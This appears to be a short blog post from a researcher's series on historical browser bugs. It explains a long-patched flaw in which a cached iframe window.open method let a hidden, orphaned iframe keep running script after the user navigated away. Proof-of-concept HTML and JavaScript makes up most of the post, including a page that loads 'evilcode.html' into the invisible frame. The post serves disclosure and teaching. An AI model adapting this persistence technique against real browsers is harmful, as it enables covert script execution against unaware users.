Resident Script Execution via Cached iFrame window.open

Caching the open method from an iFrame’s window object and then navigating away preserved a reference that could load arbitrary content into that invisible iFrame regardless of where the user browsed next. The iFrame survived the main page navigation and continued executing.

index.html:

function main()
{
	window.open("newtab.html");
}

function doIt()
{
	cachedOpen("evilcode.html", "_top");
}

newtab.html:

<iframe></iframe>
<script>
window.onload = function()
{
	opener.cachedOpen = window[0].open;
	document.write('<script>opener.doIt();setTimeout(\'location = "http://www.bing.com"\', 1000);<\/script>');
	document.close();
}
</script>

The new tab contained a bare <iframe>. On load, it stored the iFrame’s window.open method in opener.cachedOpen and then called opener.doIt(), which used the cached method to load evilcode.html into the iFrame. The new tab then navigated itself to Bing. The iFrame — invisible and orphaned — survived the navigation and executed whatever evilcode.html contained, with no further user interaction.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Resident Script Execution via HTML Object Element and createPopup] :: [UXSS: htmlFile ActiveX + about:blank Meta-Refresh + Link Click] >